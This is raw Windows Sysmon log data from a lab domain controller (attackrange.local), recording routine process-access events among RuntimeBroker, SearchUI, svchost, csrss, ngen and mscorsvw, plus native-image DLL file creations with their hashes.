21:06:57.515{4DB9351A-9F2B-60D3-C400-00000000CF01}7765124C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x800000000000000022615Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:57.515{4DB9351A-9F2B-60D3-C400-00000000CF01}7764780C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x800000000000000022614Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:57.515{4DB9351A-9F2B-60D3-C400-00000000CF01}7765124C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x800000000000000022613Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:57.515{4DB9351A-9F2B-60D3-C400-00000000CF01}7765472C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+26297|C:\Windows\system32\windows.cortana.Desktop.dll+214fb|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x800000000000000022612Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:57.515{4DB9351A-9F2B-60D3-C400-00000000CF01}7765472C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+21491|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x800000000000000022611Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:57.499{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A271-60D3-2D05-00000000CF01}7116C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022610Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:57.468{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A271-60D3-2D05-00000000CF01}7116C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022609Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:57.468{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A271-60D3-2D05-00000000CF01}7116C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022608Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:57.468{4DB9351A-A271-60D3-2C05-00000000CF01}6472NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\0B3SL8OQYF\AuditPolicyGPManagedStubs.Interop.ni.dll.auxMD5=CB8DA466E42AB9DEC2FFE9A237C2152C,SHA256=7BE538E381DACF79692FE14EFA34B5BA9026472E141FC4B3F1CC4BE067F773BB,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000022607Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:57.468{4DB9351A-A271-60D3-2C05-00000000CF01}6472NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\0B3SL8OQYF\AuditPolicyGPManagedStubs.Interop.ni.dllMD5=38B06A7F6FDC53399BA3F9640A421FFF,SHA256=5BBC3A4F42BC6EF2074AC3038F02D89B88555DC9A06C304D4A4AF80C1EE96274,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000022606Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:57.452{4DB9351A-9F2B-60D3-C400-00000000CF01}7765124C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x800000000000000022605Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:57.452{4DB9351A-9F2B-60D3-C400-00000000CF01}7765124C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x800000000000000022604Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:57.452{4DB9351A-9F2B-60D3-C400-00000000CF01}7764780C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x800000000000000022603Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:57.452{4DB9351A-9F2B-60D3-C400-00000000CF01}7764780C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x800000000000000022602Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:57.452{4DB9351A-9F2B-60D3-C400-00000000CF01}7765472C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x800000000000000022601Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:57.452{4DB9351A-9F2B-60D3-C400-00000000CF01}7765472C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x800000000000000022600Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
soft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022697Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:58.611{4DB9351A-A272-60D3-3405-00000000CF01}5096NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\20BRH0HLAR\Microsoft.Activities.Build.ni.dll.auxMD5=181694864774E61401FEE86F3F04C5E0,SHA256=ED7074DF4F5FD040835AE05690188ABE257393A3575A2FB595512161E0CBAA10,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022696Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:58.611{4DB9351A-A272-60D3-3405-00000000CF01}5096NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\20BRH0HLAR\Microsoft.Activities.Build.ni.dllMD5=295A05B60553EFEDA99066CCF83902C6,SHA256=5C16A4A5E49F5E6CD63FC3FD88A4D57F7FEAD32624DFF913745AFEF70063D7AC,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000022695Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:58.580{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A272-60D3-3405-00000000CF01}5096C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000022694Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:58.533{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A272-60D3-3405-00000000CF01}5096C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022693Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:58.533{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A272-60D3-3405-00000000CF01}5096C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Micro
soft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022692Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:58.533{4DB9351A-A272-60D3-3305-00000000CF01}5516NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\R3KAU2QB1L\ipamapi.ni.dll.auxMD5=39CC25500D78930082A6A370B38337C4,SHA256=E8BF4575E516C330F2BB6ADF06DFE29D1653F19125D24F1265921679DB280881,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022691Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:58.533{4DB9351A-A272-60D3-3305-00000000CF01}5516NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\R3KAU2QB1L\ipamapi.ni.dllMD5=7511815FCDE639D51F253CEE16E64B16,SHA256=FFDB8F0FC789C7E0167F5E262688ECC5A884400E6881FDF1EB22CA7E16D49811,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000022690Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:58.314{4DB9351A-A271-60D3-3005-00000000CF01}71244716C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022689Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
